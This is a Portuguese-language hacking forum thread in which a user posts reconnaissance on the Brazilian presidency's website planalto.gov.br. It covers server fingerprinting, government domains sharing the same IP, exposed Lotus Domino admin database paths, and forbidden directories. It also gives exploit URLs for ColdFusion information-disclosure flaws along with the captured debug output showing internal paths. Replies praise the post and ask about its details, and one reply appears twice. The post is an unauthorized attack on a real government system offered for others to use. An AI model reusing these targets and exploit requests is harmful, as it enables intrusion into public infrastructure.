Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

planalto.gov.br

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Dica planalto.gov.br

    Bom Galerinha fiquei um tempinho fora do forum.Mas Sempre vou Acompanhar O Gh Bom vamos lá o que me Interessa

    Código PHP:
    ALVOWWW.PLANALTO.GOV.BR 200.181.15.9
    Sistema Operacional
    Windows Server 2008 R2 ou Windows 7
    IIS
    Microsoft IIS httpd 6.0
    Criadores 
    do sistema do sitewww.casnav.mar.mil.br Centro de analises de sistemas navais 
    Código PHP:
    ==================================================================================================================
    ==================================================================================================================
    ================================================================================================================== 
    Código PHP:
    Reverse IP Domain Check:

    200.181.15.9 (linkback)
    2ccr.pgr.mpf.gov.br (linkback)
    mds.gov.br (linkback)
    planalto.gov.br (linkback)
    portal.mec.gov.br (linkback)
    portal2.tcu.gov.br (linkback)
    prouniportal.mec.gov.br (linkback)
    www.anatel.gov.br (linkback)
    www.bc.gov.br (linkback)
    www.bcb.gov.br (linkback)
    www.diaadia.pr.gov.br (linkback)
    www.diaadiaeducacao.pr.gov.br (linkback)
    www.dpf.gov.br (linkback)
    www.eletronorte.gov.br (linkback)
    www.eln.gov.br (linkback)
    www.mds.gov.br (linkback)
    www.mma.gov.br (linkback)
    www.planalto.gov.br (linkback)
    www.policiafederal.gov.br (linkback)
    www.presidencia.gov.br (linkback)
    www.sefaz.rs.gov.br (linkback)
    www.spmulheres.gov.br (linkback)
    www2.tcu.gov.br (linkback
    Código PHP:
    ==================================================================================================================
    ==================================================================================================================
    ================================================================================================================== 
    Código PHP:
    SubDominiowww.saj.planalto.gov.br
    Sistema Operacional
    Linux 2.6.9 2.6.27 (precisão 100%)
    Portas Abertas:
    80/http Lotus Domino httpd
    443
    /ssl Lotus Domino httpd 
    Código PHP:
    Arquivos Do Banco de dados:
    http://www.saj.planalto.gov.br/log.nsf - Acesso Restrito
    http://www.saj.planalto.gov.br/webadmin.nsf - Administração(Login)
    http://www.saj.planalto.gov.br/statrep.nsf - Acesso Restrito
    http://www.saj.planalto.gov.br/events4.nsf - Acesso Restrito
    http://www.saj.planalto.gov.br/names.nsf - Acesso Restrito
    http://www.saj.planalto.gov.br/domcfg.nsf/cssLogin - Administração(Login)
    http://www.saj.planalto.gov.br/reports.nsf - Acesso Restrito 
    Código PHP:
    planalto.gov.br/catalog.nsf  Directory Catalog
    http
    ://www.saj.planalto.gov.br/domcfg.nsf - Web Server Configuration
    http://www.saj.planalto.gov.br/quickstart/wwsample.nsf - Water Works Intranet
    http://www.saj.planalto.gov.br/quickstart/qstart50.nsf - QuickStart Tutorial
    http://www.saj.planalto.gov.br/homepage.nsf - Lotus.Dominio IBM
    http://www.saj.planalto.gov.br/help/help65_admin.nsf - Domino 6.5 Administrator Help 
    Código PHP:
    ==================================================================================================================
    ==================================================================================================================
    ================================================================================================================== 
    Código PHP:
    Diretórios Forbidden:
    http://www.planalto.gov.br/downloads/
    http://www.planalto.gov.br/new folder/
    http://www.planalto.gov.br/ccivil_03/revista/
    http://www.planalto.gov.br/gsi/saei/CLAD/
    http://www.planalto.gov.br/ccivil_03/_Ato2007-2010/
    http://www.planalto.gov.br/ccivil_03/leis/
    http://www.planalto.gov.br/ccivil_03/decreto/
    http://www.planalto.gov.br/ccivil_03/Leis/LEIS_2001/
    http://www.planalto.gov.br/ccivil_03/revista/Rev_84/artigos/
    http://www.planalto.gov.br/ccivil_03/revista/Rev_84/MemoriaJuridica/
    http://www.planalto.gov.br/ccivil_03/_Ato2011-2014/2012/Decreto/
    http://www.planalto.gov.br/consea/3conferencia/exec/
    http://www.planalto.gov.br/consea/3conferencia/static/Documentos/
    http://www.planalto.gov.br/acpr/pdf/
    http://www.planalto.gov.br/gsi/saei/paginas/
    http://www.planalto.gov.br/ccivil_03/revista/rev_81/MonoDisTeses/ 
    Código PHP:
    FalhaSSL 2.0 deprecated protocol
    Porta
    443
    Informações
    É possivel se passar como servidor e ganhar as senhas do SSL através da tecnica Man-in-Maddle 
    Código PHP:
    FalhaColdFusion DOS Device File Request System Information Disclosure Vulnerability
    Informações
    http://www.securityfocus.com/bid/4542/info
    Url:http://www.planalto.gov.br/nul.cfm
    Url:http://www.planalto.gov.br/nul.dbm

    Explicação:
    Apresentação de um DOS no arquivo não-existenteCfm ouDbmfará com que o 
    anfitrião ColdFusion para retornar uma mensagem 
    de erro contendo o caminho para a raiz da web 
    (informações confidenciais do sistema). 
    Código PHP:
    FalhaColdFusion debug Mode Information Disclosure
    Informções
    :É possivel visualizar informações do ColdFusion
    URL
    www.planalto.gov.br/yHjQIr.cfm?mode=debug 
    Código PHP:
    ########
    #####Resultado Da Exploração Da Falha:
    ########

    Execution Time:
    0 milliseconds

    URL Parameters
    :
    MODE=debug

    CGI Variables
    :

    AUTH_PASSWORD=
    AUTH_TYPE=
    AUTH_USER=
    CERT_COOKIE=
    CERT_FLAGS=
    CERT_ISSUER=
    CERT_KEYSIZE=
    CERT_SECRETKEYSIZE=
    CERT_SERIALNUMBER=
    CERT_SERVER_ISSUER=
    CERT_SERVER_SUBJECT=
    CERT_SUBJECT=
    CF_TEMPLATE_PATH=D:\Inetpub\wwwPlanalto\yHjQIr.cfm
    CONTENT_LENGTH
    =0
    CONTENT_TYPE
    =
    GATEWAY_INTERFACE=CGI/1.1
    HTTP_ACCEPT
    =text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    HTTP_ACCEPT_ENCODING=gzip, deflate
    HTTP_ACCEPT_LANGUAGE=pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
    HTTP_CACHE_CONTROL=max-age=136800
    HTTP_CONNECTION=keep-alive
    HTTP_HOST=www.planalto.gov.br
    HTTP_USER_AGENT=Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0
    HTTP_VIA=1.1 localhost.turbonet:8080 (Lusca/LUSCA_HEAD-r14716)
    HTTP_X_FORWARDED_FOR=192.168.0.198
    HTTPS=off
    HTTPS_KEYSIZE=
    HTTPS_SECRETKEYSIZE=
    HTTPS_SERVER_ISSUER=
    HTTPS_SERVER_SUBJECT=
    PATH_INFO=/yHjQIr.cfm
    PATH_TRANSLATED=D:\Inetpub\wwwPlanalto\yHjQIr.cfm
    QUERY_STRING=mode=debug
    REMOTE_ADDR=189.70.145.29
    REMOTE_HOST=189.70.145.29
    REMOTE_USER=
    REQUEST_METHOD=GET
    SCRIPT_NAME=/yHjQIr.cfm
    SERVER_NAME=www.planalto.gov.br
    SERVER_PORT=80
    SERVER_PORT_SECURE=0
    SERVER_PROTOCOL=HTTP/1.0
    SERVER_SOFTWARE=Microsoft-IIS/6.0
    WEB_SERVER_API=ISAPI 
    Bom é isso Galerinha Espero Que tenha Gostado e espero Ter ajudado

  • Font Size
    #2
    Muito bom inocente, parabéns!

    Comment


    • Font Size
      #3
      Dei uma olhada rápida e não entendi algumas coisas, vc descobriu o SSL no servidor que estava hospedado em Linux do SAJ e depois vc usou o xpl no que estava hospedado no Windows, ou eu estou me confundindo aqui ou vc fez alguma confusão ai na hora de postar.

      Vou citar aqui o que estou querendo dizer:

      Vc mostrando que este servidor estava em Windows:

      ALVO: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... - 200.181.15.9
      Sistema Operacional: Windows Server 2008 R2 ou Windows 7
      IIS: Microsoft IIS httpd 6.0
      Criadores do sistema do site: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... - Centro de analises de sistemas navais
      Vc mostrando que este servidor estava em Linux e o SSL lá:

      SubDominio: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
      Sistema Operacional: Linux 2.6.9 - 2.6.27 (precisão 100%)
      Portas Abertas:
      80/http - Lotus Domino httpd
      443/ssl - Lotus Domino httpd
      Vc falando sobre a técnica homem no meio (aqui estava se referindo ao xpl achado para o SSL no servidor Linux certo?)

      Falha: SSL 2.0 deprecated protocol
      Porta: 443
      Informações: É possivel se passar como servidor e ganhar as senhas do SSL através da tecnica Man-in-Maddle
      Aqui vc usou o xpl no servidor Windows.. aqui já não entendi, se vc descobriu xpl para SSL no servidor Linux porque usou aqui no Windows?

      Falha: ColdFusion DOS Device File Request System Information Disclosure Vulnerability
      Informações: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
      Url:Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
      Url:Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

      Explicação:
      Apresentação de um DOS no arquivo não-existente. Cfm ou. Dbm, fará com que o
      anfitrião ColdFusion para retornar uma mensagem
      de erro contendo o caminho para a raiz da web (informações confidenciais do sistema).
      Fora essa dúvida eu queria saber o que vc pode fazer com a raiz do site fora saber os diretórios?

      PATH_TRANSLATED=D:\Inetpub\wwwPlanalto\yHjQIr.cfm
      Windows

      Desculpe minha ignorância e alguma besteira que eu possa ter dito aqui.

      Comment


      • Font Size
        #4
        Dei uma olhada rápida e não entendi algumas coisas, vc descobriu o SSL no servidor que estava hospedado em Linux do SAJ e depois vc usou o xpl no que estava hospedado no Windows, ou eu estou me confundindo aqui ou vc fez alguma confusão ai na hora de postar.

        Vou citar aqui o que estou querendo dizer:

        Vc mostrando que este servidor estava em Windows:

        ALVO: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... - 200.181.15.9
        Sistema Operacional: Windows Server 2008 R2 ou Windows 7
        IIS: Microsoft IIS httpd 6.0
        Criadores do sistema do site: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... - Centro de analises de sistemas navais
        Vc mostrando que este servidor estava em Linux e o SSL lá:

        SubDominio: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
        Sistema Operacional: Linux 2.6.9 - 2.6.27 (precisão 100%)
        Portas Abertas:
        80/http - Lotus Domino httpd
        443/ssl - Lotus Domino httpd
        Vc falando sobre a técnica homem no meio (aqui estava se referindo ao xpl achado para o SSL no servidor Linux certo?)

        Falha: SSL 2.0 deprecated protocol
        Porta: 443
        Informações: É possivel se passar como servidor e ganhar as senhas do SSL através da tecnica Man-in-Maddle
        Aqui vc usou o xpl no servidor Windows.. aqui já não entendi, se vc descobriu xpl para SSL no servidor Linux porque usou aqui no Windows?

        Falha: ColdFusion DOS Device File Request System Information Disclosure Vulnerability
        Informações: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
        Url:Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
        Url:Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

        Explicação:
        Apresentação de um DOS no arquivo não-existente. Cfm ou. Dbm, fará com que o
        anfitrião ColdFusion para retornar uma mensagem
        de erro contendo o caminho para a raiz da web (informações confidenciais do sistema).
        Fora essa dúvida eu queria saber o que vc pode fazer com a raiz do site fora saber os diretórios?

        PATH_TRANSLATED=D:\Inetpub\wwwPlanalto\yHjQIr.cfm
        Windows

        Desculpe minha ignorância e alguma besteira que eu possa ter dito aqui.

        Comment

        X
        Working...
        X